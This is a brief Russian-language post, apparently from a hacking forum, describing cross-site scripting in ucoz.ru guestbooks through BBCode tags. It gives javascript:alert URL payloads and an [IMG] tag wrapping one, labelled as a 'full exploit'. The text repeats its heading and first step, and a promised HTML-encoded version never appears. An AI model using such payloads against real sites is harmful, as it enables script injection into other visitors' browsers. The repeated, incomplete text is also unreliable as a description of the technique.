Cross Site Scripting в гостевых книгах ucoz.ru
XSS в тегах
Сначало берем какой нибудь скрипт на JS:
Затем кодируем это в html кодировку:
И вот полный эксплоит:
XSS в тегах
Сначало берем какой нибудь скрипт на JS:
Код:
JavаScript:alert("by nmb795, 'XSS'")
Код:
javascript:alert("by t0x1n, 'XSS'")
Код:
[IMG]javascript:alert("by t0x1n, 'XSS'")[/IMG]